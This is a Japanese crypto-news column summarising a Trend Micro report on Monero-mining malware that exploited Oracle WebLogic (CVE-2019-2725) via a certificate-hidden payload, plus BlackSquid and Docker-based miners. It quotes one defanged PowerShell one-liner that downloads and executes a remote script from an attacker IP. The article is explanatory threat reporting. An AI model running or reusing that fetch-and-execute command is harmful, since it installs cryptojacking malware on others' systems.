CoinPostで今最も読まれています

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

画像はShutterstockのライセンス許諾により使用

マイニングマルウェアの脅威が絶えない
トレンドマイクロ社が、仮想通貨モネロをマイニングするマルウェアの脅威について報告書を公開した。当該脆弱性の分析、そして現在も存在している端末に侵入してマイニングを行うマルウェアについて確認する。

トレンドマイクロ社が報告書を公開

サイバーセキュリティを専門とする「トレンドマイクロ社」は6月10日、マイニングマルウェアの脅威について報告書を公開した。

公開された報告書は、【Oracle Weblogic】というソフトウェアの脆弱性(CVE-2019-2725)を利用して仮想通貨モネロをマイニングするマルウェアに関するものだ。当該脆弱性の分析、そして2019年に入ってからも続く、端末に侵入してマイニングを行うマルウェア(ここではマイニングマルウェアと呼称する)について見ていきたい。

トレンドマイクロ社の報告から見えてくるもの

このマルウェアに関する分析は、SANS ISC INFOSECフォーラムが情報源となっている。

そもそもOracle WebLogicは、JAVAが動くアプリケーションサーバーだ。もう少し詳しく説明すると、オラクル社が提供する業務用ミドルウェアや開発者向け製品などのソフトウェア製品群であり、エンジニアを除けば普通は扱うことはないだろう。

しかし、脆弱性の利用方法を見ていくと興味深い点が見つかる。ブラウザはHTTPSで暗号化された通信を行うため、相手が正しいURL(例えば coinpost.jp)であることを証明書を使って確認する。そして、今回はこの証明書に攻撃のペイロード(実際に攻撃を行うためのコード)が含まれていた。

以下の画像は、証明書を実際に見たことがある人向けだが、一見、普通の証明書に見える。

出典 : TREND MICRO

しかしこれをデコードすると、攻撃ペイロードのPowershellスクリプトが含まれていることが分かる。URLはhxxpとなっているが、特定のIPアドレスに通信を行っていることが分かるだろうか。この処理が行われてしまうと、update.ps1というスクリプトが実行され、勝手にモネロをマイニングされてしまうのだ。

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

証明書を利用してマルウェアを配布するというアイデア自体は目新しいものではない。 昨年時点で概念実証は行われており、Excelをマクロを含めて実行させるなど、実行可能であることが示されていた。

一方で今回の事例を見ると、証明書に隠したスクリプト単体で動作するものではなく、特定IPへの通信は複雑な技術を用いずに通信される仕組みになっている。つまり、この通信をマルウェア対策ソフトウェアなどで検知される可能性があるということだ。この点は、まだまだ攻撃に改良の余地があることを示しており、報告書でもテストの可能性があると述べている。

活発化するマイニングマルウェアによる攻撃

ビットコインなど暗号資産の価格が上昇するに伴い、攻撃者の活動も活発化している様子だ。 6月10日には8つの脆弱性を利用してマイニングマルウェアを送り込むBlackSquidについて、6月11日にはインターネットから接続可能なデバイスを探索した上でDockerコンテナを送り込むという手口に関して、同様にトレンドマイクロ社が日本語で注意喚起している。

前者のBlackSquidは、いずれも比較的古い脆弱性(EternalBlueやDoublePalserと呼ばれるもの等)を対象としており、恐らく既存のマルウェアなどを組み合わせたものと考えられる。

攻撃結果として、やはりモネロのマイニングを行うマイナーXMRigを起動する。 タイと米国で多く検出されたということだが、実装されていない機能も存在することから、将来的にさらなる開発が進められる可能性があるとのことだ。

エラーを含むコードや意図的にスキップされた機能を考慮すると、このマルウェアは開発およびテストの段階にあると考えられる。今後、不正アクセスや情報窃取などのさまざまな攻撃に利用されるかもしれない。あるいは、GPUリソースの有無によってコンポーネントを使い分けながら最も多くの利益を上げられる方法を調査しているのかもしれない。

さらに、彼らは大きな資本投下はせずに特定の標的を定めようとしている可能性もある。そのように考えられる理由は、BlackSquidが利用する脆弱性攻撃コードおよび手口の大多数がアンダーグラウンドで共有されているものであることや、「Shodan」のような有料のサービスを利用して対象を絞り込まずにランダムに生成したIPアドレスに攻撃を仕掛けている点だ。

また、後者のDockerコンテナを用いた手口でも、やはりMoneroを採掘するマイナーが含まれていた。Dockerに代表されるコンテナ技術は、LinuxやWindowsといったOSそれ自体を管理する手間を省力化できるなどの理由で急速に普及している。一方、新しい技術であることから、設定ミスがあると攻撃に晒されてしまう事例と言える。

出典 : TREND MICRO

おわりに

トレンドマイクロ社から報じられた攻撃について、複数の種類のマイニングマルウェアが出回っている点を紹介した。攻撃者がモネロをマイニングするのは利益や匿名性といった点を考慮した結果だと思われるが、将来も同じとは限らない。

また、暗号資産のマイニングに限らず、脆弱な環境は様々な形で悪用されてしまうだろう。ユーザー側の対策としては、OSやソフトウェアはなるべく最新にアップデートしたり、何か新しいものを取り入れるときは公式の情報を確認したり、仕組みを理解して使うことが大切だ。

坪 和樹

Twitter:https://twitter.com/TSB_KZK

Linkedin:https://www.linkedin.com/in/tsubo/

プロフィール:AWSで働くエンジニア、アイルランド在住。MtGoxやThe DAOでは被害を受けたが、ブロックチェーンのセキュリティに興味を持ち続けている。セキュリティカンファレンスでの講演、OWASP Japanの運営協力やMini Hardeningといったイベント立ち上げなど、コミュニティ活動も実績あり。

CoinPostの関連記事

流出した2300万XRP(リップル)の行方、仮想通貨交換所が一部の売却阻止に成功
仮想通貨取引所GateHubから総額23,200,000XRP(約10億円)の仮想通貨XRPが流出した事件で、交換サービスChangeNowはその一部の差し止めに成功したことがわかった。
仮想通貨「ミキシングサービス」の相次ぐ閉鎖、資金引き出しに関するリスクも
大手ミキシングサービスBitBlenderが閉鎖してサービス停止が発表された。同様のサービスの閉鎖が相次いでおり、仮想通貨ビットコインなど預けた資産が取り出せなくなるケースが多発している。
CoinPost App DL
注目・速報 相場分析 動画解説 新着一覧
09/16 月曜日
15:00
テザーなどステーブルコイン発行企業4社、北朝鮮ハッカー集団保有の7億円相当を凍結
ステーブルコイン発行企業4社が北朝鮮ハッカー集団ラザルスの資金と思しき7億円相当の暗号資産(仮想通貨)を凍結した。3年間で280億円のマネーロンダリングも明らかに.。
14:45
コインベースCEO、ブラックロックへのビットコインIOU発行疑惑を全面否定
米大手仮想通貨取引所コインベースのブライアン・アームストロングCEOは、ブラックロックに対しビットコインの借用証明書(IOU)を発行し、相場操縦しているとの噂を全面否定。ETF運用について説明した。
14:23
イーサリアム次期アップグレード「Pectra」、2段階の実施案が浮上
イーサリアムの次期アップグレード「Pectra」を2段階で実施する可能性を開発者会議が検討中。Pectraの内容も解説。
11:00
仮想通貨ウォレット「BOSS Wallet」でのステーブルコインUSDTの保管方法を解説
ステーブルコインUSDTは、BOSS Walletのような仮想通貨ウォレットでチェーンに関係なく保管できます。この記事はBOSS WalletでのUSDTの保管の仕方についてご紹介します。
10:00
ユーザーファーストの分散型仮想通貨ウェアウォレットBOSS Walletとは
BOSS Walletは、ユーザー中心の分散型仮想通貨ソフトウェアウォレットであり、単一の秘密の復元フレーズで複数のウォレットを作成可能にしています。本記事は特徴や使い方を解説します。
09/15 日曜日
11:30
米CPI・FOMC影響でビットコイン相場が820万円に推移|bitbankアナリスト寄稿
bitbankアナリストがビットコイン相場を分析。リセッション懸念が高まる中、今週の暗号資産市場でビットコイン(BTC)は上下動。FOMCの動向が注目されている。
11:00
週刊仮想通貨ニュース|米CPIとXRP投資信託に高い関心
今週は、米CPI、グレースケールのXRP投資信託の販売再開、米マイクロストラテジーのマイケル・セイラー会長によるビットコイン価格予想に関するニュースが最も関心を集めた。
09/14 土曜日
15:00
英高等裁「USDT含むステーブルコインは法律に基づく財産」と判決
英国の高等裁判所がUSDTを法的財産と認定。仮想通貨の法的保護を強化する判決に。背景となった訴訟の詳細を解説。
13:20
「RWAトークン化市場が1.7兆円規模に成長」バイナンスの最新リサーチ
バイナンスが現実資産(RWA)トークン化市場を分析。米国債トークンが牽引し、1.7兆円規模に。法的課題や今後の展望も解説。
12:00
リップルX幹部が語る対SEC裁判やIPO|WebX2024インタビュー
WebX2024でRipple(リップル)X幹部に取材。長年に渡る米SECとの裁判や株式上場(IPO)の可能性、仮想通貨ステーブルコインの開発、日本市場の重要性について語られた。
11:00
FTX前CEOバンクマン・フリード氏、25年懲役判決に控訴 再審求める
FTX破綻事件において詐欺などで25年の判決を受けたサム・バンクマン=フリード前CEOが控訴。支払能力があったと主張し、再審を要求。
09:38
バイナンスのソラナステーキング「BNSOL」、資産運用の新たな選択肢に
世界最大の仮想通貨取引所バイナンスは12日、独自のソラナリキッドステーキングトークン(LST)である「BNSOL」の提供を正式に開始した。
08:30
米SEC、「仮想通貨証券」の表現を削除
米SECがバイナンスとの裁判で訴状を修正し、仮想通貨証券という表現を削除した。その理由について述べている。
07:30
ワールドコインのワールドID、ソラナブロックチェーンで利用可能に
サム・アルトマン氏の仮想通貨プロジェクト「ワールドコイン」のオンチェーンIDである「ワールドID」はソラナ上でも利用できるようになった。
07:00
新経済連盟、2025年度税制改正提言を発表 暗号資産税制も含む
新経済連盟が2025年度税制改正提言を発表。暗号資産の申告分離課税導入やETF取り扱い可能化など、Web3支援策を提案。日本経済活性化と国際競争力強化を目指し、AI開発やスタートアップ支援も含む16の具体策を提示。

通貨データ

グローバル情報
一覧
プロジェクト
アナウンス
上場/ペア